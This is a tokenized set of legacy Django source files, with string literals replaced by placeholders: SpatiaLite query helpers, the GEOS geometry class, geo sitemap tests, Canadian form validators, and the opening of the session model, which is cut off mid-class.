<s> """<STR_LIT>""" <EOL> import re <EOL> from decimal import Decimal <EOL> from django . db import connection <EOL> from django . contrib . gis . measure import Distance <EOL> from django . contrib . gis . db . backend . util import SpatialOperation , SpatialFunction <EOL> qn = connection . ops . quote_name <EOL> GEOM_SELECT = '<STR_LIT>' <EOL> def get_func ( str ) : <EOL> return str <EOL> AREA = get_func ( '<STR_LIT>' ) <EOL> ASSVG = get_func ( '<STR_LIT>' ) <EOL> CENTROID = get_func ( '<STR_LIT>' ) <EOL> CONTAINED = get_func ( '<STR_LIT>' ) <EOL> DIFFERENCE = get_func ( '<STR_LIT>' ) <EOL> DISTANCE = get_func ( '<STR_LIT>' ) <EOL> ENVELOPE = get_func ( '<STR_LIT>' ) <EOL> GEOM_FROM_TEXT = get_func ( '<STR_LIT>' ) <EOL> GEOM_FROM_WKB = get_func ( '<STR_LIT>' ) <EOL> INTERSECTION = get_func ( '<STR_LIT>' ) <EOL> LENGTH = get_func ( '<STR_LIT>' ) <EOL> NUM_GEOM = get_func ( '<STR_LIT>' ) <EOL> NUM_POINTS = get_func ( '<STR_LIT>' ) <EOL> POINT_ON_SURFACE = get_func ( '<STR_LIT>' ) <EOL> SCALE = get_func ( '<STR_LIT>' ) <EOL> SYM_DIFFERENCE = get_func ( '<STR_LIT>' ) <EOL> TRANSFORM = get_func ( '<STR_LIT>' ) <EOL> TRANSLATE = get_func ( '<STR_LIT>' ) <EOL> UNION = '<STR_LIT>' <EOL> UNIONAGG = '<STR_LIT>' <EOL> class SpatiaLiteOperator ( SpatialOperation ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , operator ) : <EOL> super ( SpatiaLiteOperator , self ) . __init__ ( operator = operator , beg_subst = '<STR_LIT>' ) <EOL> class SpatiaLiteFunction ( SpatialFunction ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , function , ** kwargs ) : <EOL> super ( SpatiaLiteFunction , self ) . __init__ ( get_func ( function ) , ** kwargs ) <EOL> class SpatiaLiteFunctionParam ( SpatiaLiteFunction ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , func ) : <EOL> super ( SpatiaLiteFunctionParam , self ) . 
__init__ ( func , end_subst = '<STR_LIT>' ) <EOL> class SpatiaLiteDistance ( SpatiaLiteFunction ) : <EOL> "<STR_LIT>" <EOL> dist_func = '<STR_LIT>' <EOL> def __init__ ( self , operator ) : <EOL> super ( SpatiaLiteDistance , self ) . __init__ ( self . dist_func , end_subst = '<STR_LIT>' , <EOL> operator = operator , result = '<STR_LIT>' ) <EOL> class SpatiaLiteRelate ( SpatiaLiteFunctionParam ) : <EOL> "<STR_LIT>" <EOL> pattern_regex = re . compile ( r'<STR_LIT>' ) <EOL> def __init__ ( self , pattern ) : <EOL> if not self . pattern_regex . match ( pattern ) : <EOL> raise ValueError ( '<STR_LIT>' % pattern ) <EOL> super ( SpatiaLiteRelate , self ) . __init__ ( '<STR_LIT>' ) <EOL> SPATIALITE_GEOMETRY_FUNCTIONS = { <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( SpatiaLiteRelate , basestring ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : SpatiaLiteFunction ( '<STR_LIT>' ) , <EOL> } <EOL> dtypes = ( Decimal , Distance , float , int , long ) <EOL> def get_dist_ops ( operator ) : <EOL> "<STR_LIT>" <EOL> return ( SpatiaLiteDistance ( operator ) , ) <EOL> DISTANCE_FUNCTIONS = { <EOL> '<STR_LIT>' : ( get_dist_ops ( '<STR_LIT:>>' ) , dtypes ) , <EOL> '<STR_LIT>' : ( get_dist_ops ( '<STR_LIT>' ) , dtypes ) , <EOL> '<STR_LIT>' : ( get_dist_ops ( '<STR_LIT:<>' ) , dtypes ) , <EOL> '<STR_LIT>' : ( get_dist_ops ( '<STR_LIT>' ) , dtypes ) , <EOL> } <EOL> 
SPATIALITE_GEOMETRY_FUNCTIONS . update ( DISTANCE_FUNCTIONS ) <EOL> MISC_TERMS = [ '<STR_LIT>' ] <EOL> SPATIALITE_TERMS = SPATIALITE_GEOMETRY_FUNCTIONS . keys ( ) <EOL> SPATIALITE_TERMS += MISC_TERMS <EOL> SPATIALITE_TERMS = dict ( ( term , None ) for term in SPATIALITE_TERMS ) <EOL> def get_geo_where_clause ( table_alias , name , lookup_type , geo_annot ) : <EOL> "<STR_LIT>" <EOL> geo_col = '<STR_LIT>' % ( qn ( table_alias ) , qn ( name ) ) <EOL> if lookup_type in SPATIALITE_GEOMETRY_FUNCTIONS : <EOL> tmp = SPATIALITE_GEOMETRY_FUNCTIONS [ lookup_type ] <EOL> if isinstance ( tmp , tuple ) : <EOL> op , arg_type = tmp <EOL> if not isinstance ( geo_annot . value , ( tuple , list ) ) : <EOL> raise TypeError ( '<STR_LIT>' % lookup_type ) <EOL> if len ( geo_annot . value ) != <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' % lookup_type ) <EOL> if not isinstance ( geo_annot . value [ <NUM_LIT:1> ] , arg_type ) : <EOL> raise TypeError ( '<STR_LIT>' % ( arg_type , type ( geo_annot . value [ <NUM_LIT:1> ] ) ) ) <EOL> if lookup_type == '<STR_LIT>' : <EOL> op = op ( geo_annot . value [ <NUM_LIT:1> ] ) <EOL> elif lookup_type in DISTANCE_FUNCTIONS : <EOL> op = op [ <NUM_LIT:0> ] <EOL> else : <EOL> op = tmp <EOL> return op . as_sql ( geo_col ) <EOL> elif lookup_type == '<STR_LIT>' : <EOL> return "<STR_LIT>" % ( geo_col , ( not geo_annot . value and '<STR_LIT>' or '<STR_LIT>' ) ) <EOL> raise TypeError ( "<STR_LIT>" % repr ( lookup_type ) ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from ctypes import addressof , byref , c_double , c_size_t <EOL> from django . contrib . gis . geos . mutable_list import ListMixin <EOL> from django . contrib . gis . geos . base import GEOSBase , gdal <EOL> from django . contrib . gis . geos . coordseq import GEOSCoordSeq <EOL> from django . contrib . gis . geos . error import GEOSException , GEOSIndexError <EOL> from django . contrib . gis . geos . libgeos import GEOM_PTR , GEOS_PREPARE <EOL> from django . contrib . gis . geos . mutable_list import ListMixin <EOL> from django . contrib . gis . geos import prototypes as capi <EOL> hex_regex = re . compile ( r'<STR_LIT>' , re . I ) <EOL> wkt_regex = re . compile ( r'<STR_LIT>' , re . I ) <EOL> class GEOSGeometry ( GEOSBase , ListMixin ) : <EOL> "<STR_LIT>" <EOL> _IndexError = GEOSIndexError <EOL> ptr_type = GEOM_PTR <EOL> def __init__ ( self , geo_input , srid = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( geo_input , basestring ) : <EOL> if isinstance ( geo_input , unicode ) : <EOL> geo_input = geo_input . encode ( '<STR_LIT:ascii>' ) <EOL> wkt_m = wkt_regex . match ( geo_input ) <EOL> if wkt_m : <EOL> if wkt_m . group ( '<STR_LIT>' ) : srid = int ( wkt_m . group ( '<STR_LIT>' ) ) <EOL> g = wkt_r . read ( wkt_m . group ( '<STR_LIT>' ) ) <EOL> elif hex_regex . match ( geo_input ) : <EOL> g = wkb_r . read ( geo_input ) <EOL> elif gdal . GEOJSON and gdal . geometries . json_regex . match ( geo_input ) : <EOL> g = wkb_r . read ( gdal . OGRGeometry ( geo_input ) . wkb ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> elif isinstance ( geo_input , GEOM_PTR ) : <EOL> g = geo_input <EOL> elif isinstance ( geo_input , buffer ) : <EOL> g = wkb_r . read ( geo_input ) <EOL> elif isinstance ( geo_input , GEOSGeometry ) : <EOL> g = capi . geom_clone ( geo_input . ptr ) <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' % str ( type ( geo_input ) ) ) <EOL> if bool ( g ) : <EOL> self . 
ptr = g <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> self . _post_init ( srid ) <EOL> def _post_init ( self , srid ) : <EOL> "<STR_LIT>" <EOL> if srid and isinstance ( srid , int ) : self . srid = srid <EOL> self . __class__ = GEOS_CLASSES [ self . geom_typeid ] <EOL> self . _set_cs ( ) <EOL> def __del__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _ptr : capi . destroy_geom ( self . _ptr ) <EOL> def __copy__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . clone ( ) <EOL> def __deepcopy__ ( self , memodict ) : <EOL> """<STR_LIT>""" <EOL> return self . clone ( ) <EOL> def __str__ ( self ) : <EOL> "<STR_LIT>" <EOL> return self . wkt <EOL> def __repr__ ( self ) : <EOL> "<STR_LIT>" <EOL> return '<STR_LIT>' % ( self . geom_type , hex ( addressof ( self . ptr ) ) ) <EOL> def __getstate__ ( self ) : <EOL> return str ( self . wkb ) , self . srid <EOL> def __setstate__ ( self , state ) : <EOL> wkb , srid = state <EOL> ptr = capi . from_wkb ( wkb , len ( wkb ) ) <EOL> if not ptr : raise GEOSException ( '<STR_LIT>' ) <EOL> self . ptr = ptr <EOL> self . _post_init ( srid ) <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , basestring ) : <EOL> return self . wkt == other <EOL> elif isinstance ( other , GEOSGeometry ) : <EOL> return self . equals_exact ( other ) <EOL> else : <EOL> return False <EOL> def __ne__ ( self , other ) : <EOL> "<STR_LIT>" <EOL> return not ( self == other ) <EOL> def __or__ ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . union ( other ) <EOL> def __and__ ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . intersection ( other ) <EOL> def __sub__ ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . difference ( other ) <EOL> def __xor__ ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . 
sym_difference ( other ) <EOL> @ property <EOL> def has_cs ( self ) : <EOL> "<STR_LIT>" <EOL> if isinstance ( self , ( Point , LineString , LinearRing ) ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def _set_cs ( self ) : <EOL> "<STR_LIT>" <EOL> if self . has_cs : <EOL> self . _cs = GEOSCoordSeq ( capi . get_cs ( self . ptr ) , self . hasz ) <EOL> else : <EOL> self . _cs = None <EOL> @ property <EOL> def coord_seq ( self ) : <EOL> "<STR_LIT>" <EOL> if self . has_cs : <EOL> return self . _cs . clone ( ) <EOL> @ property <EOL> def geom_type ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_type ( self . ptr ) <EOL> @ property <EOL> def geom_typeid ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_typeid ( self . ptr ) <EOL> @ property <EOL> def num_geom ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . get_num_geoms ( self . ptr ) <EOL> @ property <EOL> def num_coords ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . get_num_coords ( self . ptr ) <EOL> @ property <EOL> def num_points ( self ) : <EOL> "<STR_LIT>" <EOL> return self . num_coords <EOL> @ property <EOL> def dims ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . get_dims ( self . ptr ) <EOL> def normalize ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_normalize ( self . ptr ) <EOL> @ property <EOL> def empty ( self ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_isempty ( self . ptr ) <EOL> @ property <EOL> def hasz ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_hasz ( self . ptr ) <EOL> @ property <EOL> def ring ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_isring ( self . ptr ) <EOL> @ property <EOL> def simple ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_issimple ( self . ptr ) <EOL> @ property <EOL> def valid ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_isvalid ( self . ptr ) <EOL> def contains ( self , other ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_contains ( self . ptr , other . 
ptr ) <EOL> def crosses ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_crosses ( self . ptr , other . ptr ) <EOL> def disjoint ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_disjoint ( self . ptr , other . ptr ) <EOL> def equals ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_equals ( self . ptr , other . ptr ) <EOL> def equals_exact ( self , other , tolerance = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_equalsexact ( self . ptr , other . ptr , float ( tolerance ) ) <EOL> def intersects ( self , other ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_intersects ( self . ptr , other . ptr ) <EOL> def overlaps ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_overlaps ( self . ptr , other . ptr ) <EOL> def relate_pattern ( self , other , pattern ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( pattern , basestring ) or len ( pattern ) > <NUM_LIT:9> : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> return capi . geos_relatepattern ( self . ptr , other . ptr , pattern ) <EOL> def touches ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_touches ( self . ptr , other . ptr ) <EOL> def within ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_within ( self . ptr , other . ptr ) <EOL> def get_srid ( self ) : <EOL> "<STR_LIT>" <EOL> s = capi . geos_get_srid ( self . ptr ) <EOL> if s == <NUM_LIT:0> : return None <EOL> else : return s <EOL> def set_srid ( self , srid ) : <EOL> "<STR_LIT>" <EOL> capi . geos_set_srid ( self . ptr , srid ) <EOL> srid = property ( get_srid , set_srid ) <EOL> @ property <EOL> def ewkt ( self ) : <EOL> "<STR_LIT>" <EOL> if self . get_srid ( ) : return '<STR_LIT>' % ( self . srid , self . wkt ) <EOL> else : return self . wkt <EOL> @ property <EOL> def wkt ( self ) : <EOL> "<STR_LIT>" <EOL> return wkt_w . write ( self ) <EOL> @ property <EOL> def hex ( self ) : <EOL> """<STR_LIT>""" <EOL> return wkb_w . 
write_hex ( self ) <EOL> @ property <EOL> def json ( self ) : <EOL> """<STR_LIT>""" <EOL> if gdal . GEOJSON : <EOL> return self . ogr . json <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> geojson = json <EOL> @ property <EOL> def wkb ( self ) : <EOL> "<STR_LIT>" <EOL> return wkb_w . write ( self ) <EOL> @ property <EOL> def kml ( self ) : <EOL> "<STR_LIT>" <EOL> gtype = self . geom_type <EOL> return '<STR_LIT>' % ( gtype , self . coord_seq . kml , gtype ) <EOL> @ property <EOL> def prepared ( self ) : <EOL> """<STR_LIT>""" <EOL> if GEOS_PREPARE : <EOL> return PreparedGeometry ( self ) <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> @ property <EOL> def ogr ( self ) : <EOL> "<STR_LIT>" <EOL> if gdal . HAS_GDAL : <EOL> if self . srid : <EOL> return gdal . OGRGeometry ( self . wkb , self . srid ) <EOL> else : <EOL> return gdal . OGRGeometry ( self . wkb ) <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> @ property <EOL> def srs ( self ) : <EOL> "<STR_LIT>" <EOL> if gdal . HAS_GDAL : <EOL> if self . srid : <EOL> return gdal . SpatialReference ( self . srid ) <EOL> else : <EOL> return None <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> @ property <EOL> def crs ( self ) : <EOL> "<STR_LIT>" <EOL> return self . srs <EOL> def transform ( self , ct , clone = False ) : <EOL> """<STR_LIT>""" <EOL> srid = self . srid <EOL> if gdal . HAS_GDAL and srid : <EOL> g = gdal . OGRGeometry ( self . wkb , srid ) <EOL> g . transform ( ct ) <EOL> ptr = wkb_r . read ( g . wkb ) <EOL> if clone : <EOL> return GEOSGeometry ( ptr , srid = g . srid ) <EOL> if ptr : <EOL> capi . destroy_geom ( self . ptr ) <EOL> self . ptr = ptr <EOL> self . _post_init ( g . srid ) <EOL> else : <EOL> raise GEOSException ( '<STR_LIT>' ) <EOL> def _topology ( self , gptr ) : <EOL> "<STR_LIT>" <EOL> return GEOSGeometry ( gptr , srid = self . srid ) <EOL> @ property <EOL> def boundary ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _topology ( capi . 
geos_boundary ( self . ptr ) ) <EOL> def buffer ( self , width , quadsegs = <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> return self . _topology ( capi . geos_buffer ( self . ptr , width , quadsegs ) ) <EOL> @ property <EOL> def centroid ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _topology ( capi . geos_centroid ( self . ptr ) ) <EOL> @ property <EOL> def convex_hull ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _topology ( capi . geos_convexhull ( self . ptr ) ) <EOL> def difference ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . _topology ( capi . geos_difference ( self . ptr , other . ptr ) ) <EOL> @ property <EOL> def envelope ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _topology ( capi . geos_envelope ( self . ptr ) ) <EOL> def intersection ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . _topology ( capi . geos_intersection ( self . ptr , other . ptr ) ) <EOL> @ property <EOL> def point_on_surface ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _topology ( capi . geos_pointonsurface ( self . ptr ) ) <EOL> def relate ( self , other ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_relate ( self . ptr , other . ptr ) <EOL> def simplify ( self , tolerance = <NUM_LIT:0.0> , preserve_topology = False ) : <EOL> """<STR_LIT>""" <EOL> if preserve_topology : <EOL> return self . _topology ( capi . geos_preservesimplify ( self . ptr , tolerance ) ) <EOL> else : <EOL> return self . _topology ( capi . geos_simplify ( self . ptr , tolerance ) ) <EOL> def sym_difference ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . _topology ( capi . geos_symdifference ( self . ptr , other . ptr ) ) <EOL> def union ( self , other ) : <EOL> "<STR_LIT>" <EOL> return self . _topology ( capi . geos_union ( self . ptr , other . ptr ) ) <EOL> @ property <EOL> def area ( self ) : <EOL> "<STR_LIT>" <EOL> return capi . geos_area ( self . 
ptr , byref ( c_double ( ) ) ) <EOL> def distance ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( other , GEOSGeometry ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> return capi . geos_distance ( self . ptr , other . ptr , byref ( c_double ( ) ) ) <EOL> @ property <EOL> def extent ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . envelope <EOL> if isinstance ( env , Point ) : <EOL> xmin , ymin = env . tuple <EOL> xmax , ymax = xmin , ymin <EOL> else : <EOL> xmin , ymin = env [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> xmax , ymax = env [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> return ( xmin , ymin , xmax , ymax ) <EOL> @ property <EOL> def length ( self ) : <EOL> """<STR_LIT>""" <EOL> return capi . geos_length ( self . ptr , byref ( c_double ( ) ) ) <EOL> def clone ( self ) : <EOL> "<STR_LIT>" <EOL> return GEOSGeometry ( capi . geom_clone ( self . ptr ) , srid = self . srid ) <EOL> from django . contrib . gis . geos . linestring import LineString , LinearRing <EOL> from django . contrib . gis . geos . point import Point <EOL> from django . contrib . gis . geos . polygon import Polygon <EOL> from django . contrib . gis . geos . collections import GeometryCollection , MultiPoint , MultiLineString , MultiPolygon <EOL> GEOS_CLASSES = { <NUM_LIT:0> : Point , <EOL> <NUM_LIT:1> : LineString , <EOL> <NUM_LIT:2> : LinearRing , <EOL> <NUM_LIT:3> : Polygon , <EOL> <NUM_LIT:4> : MultiPoint , <EOL> <NUM_LIT:5> : MultiLineString , <EOL> <NUM_LIT:6> : MultiPolygon , <EOL> <NUM_LIT:7> : GeometryCollection , <EOL> } <EOL> from django . contrib . gis . geos . io import wkt_r , wkt_w , wkb_r , wkb_w <EOL> if GEOS_PREPARE : <EOL> from django . contrib . gis . geos . prepared import PreparedGeometry </s>
<s> import unittest , zipfile , cStringIO <EOL> from xml . dom import minidom <EOL> from django . test import Client <EOL> from models import City , Country <EOL> class GeoSitemapTest ( unittest . TestCase ) : <EOL> client = Client ( ) <EOL> def assertChildNodes ( self , elem , expected ) : <EOL> "<STR_LIT>" <EOL> actual = set ( [ n . nodeName for n in elem . childNodes ] ) <EOL> expected = set ( expected ) <EOL> self . assertEqual ( actual , expected ) <EOL> def test_geositemap_index ( self ) : <EOL> "<STR_LIT>" <EOL> doc = minidom . parseString ( self . client . get ( '<STR_LIT>' ) . content ) <EOL> index = doc . firstChild <EOL> self . assertEqual ( index . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( index . getElementsByTagName ( '<STR_LIT>' ) ) ) <EOL> def test_geositemap_kml ( self ) : <EOL> "<STR_LIT>" <EOL> for kml_type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> doc = minidom . parseString ( self . client . get ( '<STR_LIT>' % kml_type ) . content ) <EOL> urlset = doc . firstChild <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> urls = urlset . getElementsByTagName ( '<STR_LIT:url>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , len ( urls ) ) <EOL> for url in urls : <EOL> self . assertChildNodes ( url , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> geo_elem = url . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> geo_format = geo_elem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( kml_type , geo_format . childNodes [ <NUM_LIT:0> ] . data ) <EOL> kml_url = url . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] . childNodes [ <NUM_LIT:0> ] . data . split ( '<STR_LIT>' ) [ <NUM_LIT:1> ] <EOL> if kml_type == '<STR_LIT>' : <EOL> kml_doc = minidom . parseString ( self . client . get ( kml_url ) . 
content ) <EOL> elif kml_type == '<STR_LIT>' : <EOL> buf = cStringIO . StringIO ( self . client . get ( kml_url ) . content ) <EOL> zf = zipfile . ZipFile ( buf ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( zf . filelist ) ) <EOL> self . assertEqual ( '<STR_LIT>' , zf . filelist [ <NUM_LIT:0> ] . filename ) <EOL> kml_doc = minidom . parseString ( zf . read ( '<STR_LIT>' ) ) <EOL> if '<STR_LIT>' in kml_url : <EOL> model = City <EOL> elif '<STR_LIT>' in kml_url : <EOL> model = Country <EOL> self . assertEqual ( model . objects . count ( ) , len ( kml_doc . getElementsByTagName ( '<STR_LIT>' ) ) ) <EOL> def test_geositemap_georss ( self ) : <EOL> "<STR_LIT>" <EOL> from feeds import feed_dict <EOL> doc = minidom . parseString ( self . client . get ( '<STR_LIT>' ) . content ) <EOL> urlset = doc . firstChild <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( urlset . getAttribute ( u'<STR_LIT>' ) , u'<STR_LIT>' ) <EOL> urls = urlset . getElementsByTagName ( '<STR_LIT:url>' ) <EOL> self . assertEqual ( len ( feed_dict ) , len ( urls ) ) <EOL> for url in urls : <EOL> self . assertChildNodes ( url , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> geo_elem = url . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> geo_format = geo_elem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , geo_format . childNodes [ <NUM_LIT:0> ] . data ) </s>
<s> """<STR_LIT>""" <EOL> from django . forms import ValidationError <EOL> from django . forms . fields import Field , RegexField , Select , EMPTY_VALUES <EOL> from django . forms . util import smart_unicode <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> import re <EOL> phone_digits_re = re . compile ( r'<STR_LIT>' ) <EOL> sin_re = re . compile ( r"<STR_LIT>" ) <EOL> class CAPostalCodeField ( RegexField ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CAPostalCodeField , self ) . __init__ ( r'<STR_LIT>' , <EOL> max_length = None , min_length = None , * args , ** kwargs ) <EOL> class CAPhoneNumberField ( Field ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> def clean ( self , value ) : <EOL> """<STR_LIT>""" <EOL> super ( CAPhoneNumberField , self ) . clean ( value ) <EOL> if value in EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> value = re . sub ( '<STR_LIT>' , '<STR_LIT>' , smart_unicode ( value ) ) <EOL> m = phone_digits_re . search ( value ) <EOL> if m : <EOL> return u'<STR_LIT>' % ( m . group ( <NUM_LIT:1> ) , m . group ( <NUM_LIT:2> ) , m . group ( <NUM_LIT:3> ) ) <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> class CAProvinceField ( Field ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> def clean ( self , value ) : <EOL> from ca_provinces import PROVINCES_NORMALIZED <EOL> super ( CAProvinceField , self ) . clean ( value ) <EOL> if value in EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> try : <EOL> value = value . strip ( ) . lower ( ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> try : <EOL> return PROVINCES_NORMALIZED [ value . strip ( ) . lower ( ) ] . decode ( '<STR_LIT:ascii>' ) <EOL> except KeyError : <EOL> pass <EOL> raise ValidationError ( self . 
error_messages [ '<STR_LIT>' ] ) <EOL> class CAProvinceSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> from ca_provinces import PROVINCE_CHOICES <EOL> super ( CAProvinceSelect , self ) . __init__ ( attrs , choices = PROVINCE_CHOICES ) <EOL> class CASocialInsuranceNumberField ( Field ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> def clean ( self , value ) : <EOL> super ( CASocialInsuranceNumberField , self ) . clean ( value ) <EOL> if value in EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> match = re . match ( sin_re , value ) <EOL> if not match : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> number = u'<STR_LIT>' % ( match . group ( <NUM_LIT:1> ) , match . group ( <NUM_LIT:2> ) , match . group ( <NUM_LIT:3> ) ) <EOL> check_number = u'<STR_LIT>' % ( match . group ( <NUM_LIT:1> ) , match . group ( <NUM_LIT:2> ) , match . group ( <NUM_LIT:3> ) ) <EOL> if not self . luhn_checksum_is_valid ( check_number ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return number <EOL> def luhn_checksum_is_valid ( self , number ) : <EOL> """<STR_LIT>""" <EOL> sum = <NUM_LIT:0> <EOL> num_digits = len ( number ) <EOL> oddeven = num_digits & <NUM_LIT:1> <EOL> for count in range ( <NUM_LIT:0> , num_digits ) : <EOL> digit = int ( number [ count ] ) <EOL> if not ( ( count & <NUM_LIT:1> ) ^ oddeven ) : <EOL> digit = digit * <NUM_LIT:2> <EOL> if digit > <NUM_LIT:9> : <EOL> digit = digit - <NUM_LIT:9> <EOL> sum = sum + digit <EOL> return ( ( sum % <NUM_LIT:10> ) == <NUM_LIT:0> ) </s>
<s> import base64 <EOL> import cPickle as pickle <EOL> from django . db import models <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . conf import settings <EOL> from django . utils . hashcompat import md5_constructor <EOL> class SessionManager ( models . Manager ) : <EOL> def encode ( self , session_dict ) : <EOL> """<STR_LIT>""" <EOL> pickled = pickle . dumps ( session_dict ) <EOL> pickled_md5 = md5_constructor ( pickled + settings . SECRET_KEY ) . hexdigest ( ) <EOL> return base64 . encodestring ( pickled + pickled_md5 ) <EOL> def save ( self , session_key , session_dict , expire_date ) : <EOL> s = self . model ( session_key , self . encode ( session_dict ) , expire_date ) <EOL> if session_dict : <EOL> s . save ( ) <EOL> else : <EOL> s . delete ( ) <EOL> return s <EOL> class Session ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> session_key = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT> , <EOL> primary_key = True ) <EOL> session_data = models . TextField ( _ ( '<STR_LIT>' ) ) <EOL> expire_date = models . DateTimeField ( _ ( '<STR_LIT>' ) ) <EOL> objects = SessionManager ( ) <EOL> class Meta : 